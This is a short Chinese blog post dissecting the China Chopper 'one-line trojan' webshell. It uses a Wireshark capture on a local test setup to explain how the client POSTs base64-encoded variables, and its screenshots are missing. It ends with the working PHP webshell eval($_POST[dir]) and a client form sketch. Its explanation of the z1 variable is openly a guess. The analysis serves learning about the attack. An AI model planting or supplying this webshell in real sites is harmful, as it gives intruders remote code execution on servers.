一句话木马剖析

今天我通过菜刀来分析一下一句话原理吧，都是些基础！

 

wireshark抓包分析：

 

因为是在本地搭建的分析环境，所以要抓取回环数据包，故：



网络接口信息：



监听回环数据包：



最后问题解决了：



wireshark抓包环节：

 

首先上传一个小马：xm.php到localhost：



开启菜刀，post小马：



在wireshark查看数据包：



发现菜刀post数据一共有3个变量：



dir变量：



z0 变量：

根据上面的代码可知，z0内容是经过base64编码过的，解码试试：



可以看出z0是遍历文件的作用！

z1 变量：

通过变量2代码可知z1变量也是base64编码的，解码试试：

D:\Hack\phps\WWW\



原理总结：

菜刀仅仅就是通过3个表单post了3个变量而已，我给大家说下提交过程：

 

client：<form  name=”frm” action=”xm.php”>

                   <textareaname=”dir” >

                     z0 变量base64编码写在这!

                   </textarea>

</form>

 

对于z1 变量：

 

我不知道是怎么来的！我猜测是通过realpath(‘/’)来获取的，具体怎么获取的就不得而知了！

 

大牛有菜刀源码的可以共享一下！

 

server：<?php@eval($_POST[dir]);?>